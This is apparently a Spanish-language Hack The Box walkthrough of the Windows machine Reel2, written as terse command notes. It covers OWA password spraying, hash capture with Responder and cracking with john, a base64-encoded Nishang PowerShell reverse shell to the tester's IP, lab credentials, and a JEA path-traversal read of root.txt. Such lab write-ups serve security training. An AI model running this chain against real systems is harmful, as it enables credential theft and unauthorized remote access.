Reel2

Reel2

Jul 12, 2024
HTB Windows

nmap -A -p- -oA reel2 10.10.10.210 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA reel2 10.10.10.210

nmap -sU -O -p- -oA reel2-udp 10.10.10.210

ping -c 1 10.10.10.210

ssh_command.

nmap -p- --open -T5 -v -n 10.10.10.210

echo "10.10.10.210 reel2.htb" | sudo tee -a /etc/hosts

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.210 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6019,6116,8080 10.10.10.210 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.10.10.210:8080

ssh_command.

nmap --script http-enum -p80,443,8080 10.10.10.210 -oN webScan

ssh_command.

Nos dirigimos a http://10.10.10.210:8080

ssh_command.

Llenamos el formulario con la informacion adecuada.

ssh_command.

Vamos a seguir al usuario Sven

ssh_command.

Al darle click a sven lo podemos seguir en su pagina.

Despues nos dirigimos a la pagina de mensajes.

ssh_command.

Queremos agarrar todos los usuarios

curl -s -X GET 'http://10.10.10.210:8080/search?q=' | grep "user_follow_box_a" | awk '{print $4 " " $6}' FS=">" | sed 's/<br @//' | sed 's<\/span//' > users

ssh_command.

python /opt/SprayingToolkit/spindrift.py users --format "{f}.{last}" > users_dictionary.txt

python /opt/SprayingToolkit/spindrift.py users --format "{f}.{last}" >> users_dictionary.txt

ssh_command.

wfuzz -c --hc=404,403 -t 200 -w /usr/share/SecLists/Discovery/Web-Content/IIS.fuzz.txt https://10.10.10.210/FUZZ

ssh_command.

Nos dirigimos a https://10.10.10.210/owa

ssh_command.

python /opt/SprayingToolkit/atomizer.py owa 10.10.10.210 'Summer2020' users_dictionary.txt

Las credenciales serian HTB\s.svensson:Summer2020

ssh_command.

Esta en sueco.

ssh_command.

Le damos click a este boton

ssh_command.

ssh_command.

ssh_command.

Ponemos el siguiente mensaje

ssh_command.

Deberias de poner tu ip y darle click donde dice Skicka

responder -I tun0

ssh_command.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

ssh_command.

evil-winrm -i 10.10.10.210 -u k.svensson -p kittycat1

ssh_command.

pwsh

$pass = ConvertTo-SecureString 'kittycat1' -asplaintext -force

$cred = New-Object System.Management.Automation.PSCredential('htb\k.svensson', $pass)

Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate

ssh_command.

&{cat ../Desktop/user.txt}

ssh_command.

&{ls ../Documents/}

ssh_command.

python3 -m http.server 80

ssh_command.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .

vim Invoke-PowerShellTcpOneLine.ps1

Cambiar la ip en System.Net.Sockets.TCPClient(“10.10.14.9”,443) de este archivo

ssh_command.

cat Invoke-PowerShellTcpOneLine.ps1 | tr -d '\n' | tconv -t utf-16le | base64 -w 0; echo

ssh_command.

ssh_command.

ssh_command.

&{Powershell -e ...}

rlwrap nc -nlvp 443

ssh_command.

whoami /priv

[Environment]::Is64BitOperatingSystem

ssh_command.

cd Documents

type jea_test_account.psrc | select-string -NotMatch '^#'

ssh_command.

type 000003.log | Format-Hex

ssh_command.

$pass = ConvertTo-SecureString 'Ab!Q@vcg^%@#1' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('htb\jea_test_account', $pass)

Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate -ConfigurationName jea_test_account

ssh_command.

Check-File C:\ProgramData\..\Users\Administrator\Desktop\root.txt

ssh_command.